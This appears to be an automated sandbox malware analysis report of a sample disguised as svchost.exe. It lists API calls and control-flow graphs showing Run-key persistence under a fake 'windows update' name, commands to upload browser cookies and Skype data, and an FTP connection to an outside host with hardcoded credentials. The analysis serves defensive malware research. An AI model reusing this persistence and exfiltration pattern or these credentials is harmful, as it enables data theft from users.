        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 006715FE
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,upload cookie=%d,00000000), ref: 00671617
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 0067161E
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067162D
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00671644
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671654
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
        • Part of subcall function 00671480: fputc.MSVCR90 ref: 00671689
        • Part of subcall function 00671480: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067169E
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,tics=%d,?), ref: 006716B5
        • Part of subcall function 00671480: sprintf.MSVCR90 ref: 006716BC
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716CB
        • Part of subcall function 00671480: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006716E2
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716F2
        • Part of subcall function 00671480: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067170A
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(00676226,?,00000000), ref: 00674710
      • fgetc.MSVCR90 ref: 00674737
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(00000000,00000001,?,?,00000000), ref: 00674752
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674766
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(sub,00000000), ref: 0067477F
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674797
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(version,00000000), ref: 006747BA
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 006747D2
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(starts,00000000), ref: 006747F0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 00674808
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload skype,00000000), ref: 00674826
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP90(?), ref: 0067483E
      • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP90(upload cookie,00000000), ref: 0067485C
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 006749EE
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00674A03
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$A?$basic_string@$??0?$basic_string@$V01@V01@@$??4?$basic_string@sprintf$?erase@?$basic_string@V12@$?find@?$basic_string@$??1?$basic_string@fputc$Createfopen$??$?CloseD@1@@std@@D@2@@0@DirectoryLocalNameTimeUserV10@V?$basic_string@ValueY?$basic_string@fgetc
      • String ID: $ $"%s\svchost.exe"$C:\Users\%s\AppData\Local\windows update$Software\Microsoft\Windows\CurrentVersion\Run$\config$\status_f.txt$just reinstall$number$reg path s$starts$status number$sub$upload cookie$upload skype$version$windows update
      • API String ID: 2521483247-3358930256
      • Opcode ID: 9c38681635aa6933e9fefe07c1c626f4a4a65027883c310431153f8e6b6c2e95
      • Instruction ID: 2e39679dcfc590a3ce2afa42e4adcbbe60767b7a73fa2e65c69015fee76ad455
      • Opcode Fuzzy Hash: 9c38681635aa6933e9fefe07c1c626f4a4a65027883c310431153f8e6b6c2e95
      • Instruction Fuzzy Hash: 47D17F706147409FD708EF74ED0AB9A7BA7BB84704F40941CF54E832A1EB70A948CBA6

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 110 671669 111 671670-671693 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 110->111 111->111 112 671695-6716d4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 111->112 113 6716d6-6716fb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 112->113 114 6716fd-671703 112->114 113->113 113->114 115 671705-671728 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 114->115 116 67172a-671769 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 114->116 115->115 115->116 117 671797-67179d 116->117 118 67176b 116->118 120 6717c5-671806 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 117->120 121 67179f 117->121 119 671770-671795 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 118->119 119->117 119->119 123 67182f-671835 120->123 124 671808-67182d ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 120->124 122 6717a0-6717c3 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 121->122 122->120 122->122 125 671837 123->125 126 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 123->126 124->123 124->124 127 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 125->127 128 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 126->128 129 6718cd-6718d3 126->129 127->126 127->127 128->128 128->129 130 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 129->130 131 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 129->131 130->130 130->131 132 671967-67196d 131->132 133 67193d 131->133 134 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 132->134 135 67196f 132->135 136 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 133->136 138 671a07-671a0d 134->138 139 6719de 134->139 137 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 135->137 136->132 136->136 137->134 137->137 141 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 138->141 142 671a0f 138->142 140 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 139->140 140->138 140->140 144 671a56-671a73 call 674bfc 141->144 143 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 142->143 143->141 143->143
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671675
      • fputc.MSVCR90 ref: 00671689
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067169E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,tics=%d,?), ref: 006716B5
      • sprintf.MSVCR90 ref: 006716BC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716CB
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006716E2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006716F2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 0067170A
      • fputc.MSVCR90 ref: 0067171E
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00671733
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,starts=%d,?), ref: 0067174A
      • sprintf.MSVCR90 ref: 00671751
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671760
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 0067177C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067178C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006717A5
      • fputc.MSVCR90 ref: 006717B9
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$fputc$??4?$basic_string@?erase@?$basic_string@V01@V12@sprintf
      • String ID: $just reinstall=%d$reg path s=%s$starts=%d$sub=%d$tics=%d$version=%d
      • API String ID: 765835564-579052364
      • Opcode ID: 8ecbf6b94decb305cf17e1439f1b42a36020fad34165fd984cd3e590bb6428a9
      • Instruction ID: 45b88595b42151c48892b774e5006deb30ecfc3e444c8ea11d035c33d08e92f4
      • Opcode Fuzzy Hash: 8ecbf6b94decb305cf17e1439f1b42a36020fad34165fd984cd3e590bb6428a9
      • Instruction Fuzzy Hash: E6C1AE71508701AFD308DF24ED99AABB7B6EB85702F00955DF48E971A1DB309D88CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 147 671839 148 671840-671863 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 147->148 148->148 149 671865-6718a4 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 148->149 150 6718a6-6718cb ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 149->150 151 6718cd-6718d3 149->151 150->150 150->151 152 6718d5-6718f8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 151->152 153 6718fa-67193b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 151->153 152->152 152->153 154 671967-67196d 153->154 155 67193d 153->155 156 671995-6719dc ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z * 2 sprintf ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 154->156 157 67196f 154->157 158 671940-671965 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 155->158 160 671a07-671a0d 156->160 161 6719de 156->161 159 671970-671993 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 157->159 158->154 158->158 159->156 159->159 163 671a35-671a50 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 160->163 164 671a0f 160->164 162 6719e0-671a05 ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 161->162 162->160 162->162 166 671a56-671a73 call 674bfc 163->166 165 671a10-671a33 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z fputc 164->165 165->163 165->165
      APIs
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671845
      • fputc.MSVCR90 ref: 00671859
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067186E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,version=%d,?), ref: 00671885
      • sprintf.MSVCR90 ref: 0067188C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067189B
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006718B2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006718C2
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006718DA
      • fputc.MSVCR90 ref: 006718EE
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 00671903
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,just reinstall=%d,00000000), ref: 0067191C
      • sprintf.MSVCR90 ref: 00671923
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00671932
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 0067194C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 0067195C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671975
      • fputc.MSVCR90 ref: 00671989
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90( ), ref: 0067199E
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006719AB
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,reg path s=%s,00000000), ref: 006719BD
      • sprintf.MSVCR90 ref: 006719C4
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006719D3
      • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 006719EC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 006719FC
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 00671A15
      • fputc.MSVCR90 ref: 00671A29
      • fclose.MSVCR90 ref: 00671A3B
      • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00671A50
      Strings
      Memory Dump Source
      • Source File: 00000004.00000002.2839101689.0000000000671000.00000020.00000001.01000000.00000004.sdmp, Offset: 00670000, based on PE: true
      • Associated: 00000004.00000002.2839063676.0000000000670000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839133753.0000000000676000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839172871.0000000000678000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000004.00000002.2839202209.000000000067C000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_4_2_670000_svchost.jbxd
      Similarity
      • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$fputc$??4?$basic_string@?erase@?$basic_string@V01@V12@sprintf$??1?$basic_string@fclose
      • String ID: $just reinstall=%d$reg path s=%s$version=%d
      • API String ID: 454636785-3139052014
      • Opcode ID: 56d20d7dff1b1b1598f8a3f4de31410f25093ca4c797cd553eb32ccea70afcda
      • Instruction ID: 5515be4141823d09dfe12b6cf4cbea67139f1f29678f85b0cc1d1164a9627499
      • Opcode Fuzzy Hash: 56d20d7dff1b1b1598f8a3f4de31410f25093ca4c797cd553eb32ccea70afcda
      • Instruction Fuzzy Hash: 8561AE715087019FD708DF24ED99AABB7B6FB85702F00951DF48E971A1DB309D48CB62

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 169 6741b0-674243 DeleteFileA GetLocalTime InternetOpenA InternetConnectA 170 674433-67446a call 671480 call 674bfc 169->170 171 674249-6742c8 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 call 673b90 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z sprintf call 671260 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z FtpCreateDirectoryA 169->171 182 6742e6-6742f2 call 671cb0 171->182 183 6742ca-6742e3 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z call 6712f0 171->183 188 6742f4 call 6721f0 182->188 189 6742f9-674300 182->189 183->182 188->189 191 674306-67430d 189->191 192 6743ec-6743f3 189->192 195 67430f-674316 191->195 196 67432b-674383 RegOpenKeyExA memset RegQueryValueExA 191->196 193 674407-67442d InternetCloseHandle * 2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 192->193 194 6743f5-6743fc 192->194 193->170 194->193 199 6743fe-674404 call 673790 194->199 195->196 200 674318-67431f 195->200 197 674385-67439a ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 196->197 198 6743dc-6743e6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 196->198 201 6743ac-6743da RegSetValueExA 197->201 202 67439c-6743a6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 197->202 198->192 199->193 200->196 204 674321-674326 call 6724f0 200->204 201->192 202->201 204->192
      APIs
      • DeleteFileA.KERNELBASE(cs.exe,26DFE5F7), ref: 006741F5
      • GetLocalTime.KERNEL32(0067845C), ref: 00674200
      • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00674210
      • InternetConnectA.WININET(00000000,ruslyz.ftp.narod.ru,00000015,ruslyz,1qazse4rfv,00000001,08000000,00000000), ref: 00674236
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(connect), ref: 00674257
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP90(?,26DFE5F7,00000000,00675699,000000FF,00672550,?,?,?,26DFE5F7), ref: 00671322
        • Part of subcall function 006712F0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(00676268,?,?,?,26DFE5F7), ref: 00671332
        • Part of subcall function 006712F0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,?,?,?,26DFE5F7), ref: 0067133F
        • Part of subcall function 006712F0: SendMessageA.USER32(00020424,0000000C,00000000,00000000), ref: 00671351
        • Part of subcall function 006712F0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90(?,?,?,26DFE5F7), ref: 00671363
        • Part of subcall function 00673B90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ,26DFE5F7), ref: 00673BD4
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d\status.txt,FFFFFFFF), ref: 00673BF6
        • Part of subcall function 00673B90: sprintf.MSVCR90 ref: 00673BFD
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C10
        • Part of subcall function 00673B90: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001), ref: 00673C2C
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?), ref: 00673C3C
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00000000,00000000,00000002,00000000), ref: 00673C6A
        • Part of subcall function 00673B90: FtpGetFileA.WININET(00000000,status.txt,00000000), ref: 00673C7D
        • Part of subcall function 00673B90: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,00676A00), ref: 00673C97
        • Part of subcall function 00673B90: fopen.MSVCR90 ref: 00673CA4
        • Part of subcall function 00673B90: fopen.MSVCR90 ref: 00673CB5
        • Part of subcall function 00673B90: memset.MSVCR90 ref: 00673CC8
        • Part of subcall function 00673B90: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP90 ref: 00673CD6
        • Part of subcall function 00673B90: fgetc.MSVCR90 ref: 00673CFC
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90( ), ref: 00674273
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000,v_%d,FFFFFFFF), ref: 00674295
      • sprintf.MSVCR90 ref: 0067429C
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,00672A9E,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671267
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067127B
        • Part of subcall function 00671260: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(?,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 00671288
        • Part of subcall function 00671260: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP90(?,00000001,?,?,00000000,?,?,?,00676224,?,?,00000000), ref: 0067129C
      • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP90(00000000), ref: 006742B2
      • FtpCreateDirectoryA.WININET(00000000,00000000), ref: 006742C0
      • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP90(cre folder), ref: 006742D8
      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,000F003F,?), ref: 00674341
      • memset.MSVCR90 ref: 00674353
      • RegQueryValueExA.ADVAPI32 ref: 0067437B
      • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP90(0067B270,00676226), ref: 0067438F
      • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP90(?,?,?), ref: 006743A6
